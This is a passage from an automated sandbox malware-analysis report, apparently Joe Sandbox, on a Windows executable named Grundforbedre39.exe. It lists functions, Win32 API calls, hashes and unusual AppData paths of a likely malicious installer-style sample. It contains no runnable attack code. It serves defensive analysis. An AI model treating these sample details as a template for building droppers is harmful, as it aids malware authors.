                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString
                                                                                      • String ID:
                                                                                      • API String ID: 1096422788-0
                                                                                      • Opcode ID: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction ID: 8b162ba546b3877e829776e4b8c3d619a2c74ac71086561365c339888b8acfb9
                                                                                      • Opcode Fuzzy Hash: e95e7b58a01c094ed04e695a4ca6ba6fac99f72604aa6d91b41b78e2544a399b
                                                                                      • Instruction Fuzzy Hash: 61E04F30800204BBDF01AFA4CE49DBD3B79AB00344F14043AF900AB1D5E7F89A809749
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040412A Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                      • Instruction ID: 41fb3c375bc4c6d8b97388dc18782044d705989845ec456808571e00864cea1f
                                                                                      • Opcode Fuzzy Hash: b125a5c22b87fd8b2e045755239ffd7a4507a0aeed0b74e9a53f3222272f23b7
                                                                                      • Instruction Fuzzy Hash: 76C09B717443017BDA308F509D49F1777556794B40F54C8797700F60D0C674E451D61D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404113 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,?,00000001,00403F3F), ref: 00404121
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                      • Instruction ID: c6b71f3973dfff953bb7db756b4a53cf392e498aed0f9e65811aff82f73edd61
                                                                                      • Opcode Fuzzy Hash: 854be05ff51811c00036400083eb45e7be68dca0691a3475263c9078411ad26b
                                                                                      • Instruction Fuzzy Hash: 81B09235684200BADA214B00ED09F867A62A768701F008864B300240B0C6B244A2DB19
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403222 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403500,?), ref: 00403230
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                                      • Instruction ID: 0576ba63ef0ea8b46fce932fbf196e130763cebcf3e43c4cce3b0366b0281484
                                                                                      • Opcode Fuzzy Hash: 500ff757afade42e276d5337a77ed9e8e494b853a2931491cde3850712262a81
                                                                                      • Instruction Fuzzy Hash: 64B01231584200BFDB214F00DE05F057B21A790700F10C030B304780F082712460EB0D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404100 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403ED8), ref: 0040410A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction ID: 8b53a25d375a508ca0f68064fdc939b5f25de369c98bd294fc40859475f67141
                                                                                      • Opcode Fuzzy Hash: 52bdda195f1be107111d33c53c23f47bc3bdbd5ca81d52a4b6bb6385c1bcbce2
                                                                                      • Instruction Fuzzy Hash: 02A01132808000ABCA028BA0EF08C0ABB22BBB8300B008A3AB2008003082320820EB0A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00404AF5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B0D
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B18
                                                                                      • GlobalAlloc.KERNEL32(?,?), ref: 00404B62
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404B75
                                                                                      • SetWindowLongW.USER32(?,?,004050ED), ref: 00404B8E
                                                                                      • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BA2
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BB4
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404BCA
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BD6
                                                                                      • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404BE8
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404BEB
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C16
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C22
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CB8
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CE3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF7
                                                                                      • GetWindowLongW.USER32(?,?), ref: 00404D26
                                                                                      • SetWindowLongW.USER32(?,?,00000000), ref: 00404D34
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D45
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E42
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EA7
                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EBC
                                                                                      • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404EE0
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F00
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F15
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F25
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404F9E
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405047
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405056
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00405076
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050C4
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004050CF
                                                                                      • ShowWindow.USER32(00000000), ref: 004050D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                                                      • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                                                      • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404579 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 004046E0
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004046EC
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75B23420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Grundforbedre39.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$&B
                                                                                      • API String ID: 2624150263-2809856882
                                                                                      • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                                                      • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                                      • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004074E4,?,00000001,004074D4,?,?,00000045,000000CD,00000002,000000DF,?), ref: 00402114
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb, xrefs: 00402154
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb
                                                                                      • API String ID: 542301482-2699030423
                                                                                      • Opcode ID: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                                                      • Opcode Fuzzy Hash: ca950f7afeac7727567225d74bb161ffe9235428eb8415ca3734983ba85d589a
                                                                                      • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040427B Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                                                      • SendMessageW.USER32(?,00000000,00000000), ref: 004044E2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: Call$N$open
                                                                                      • API String ID: 3615053054-2563687911
                                                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
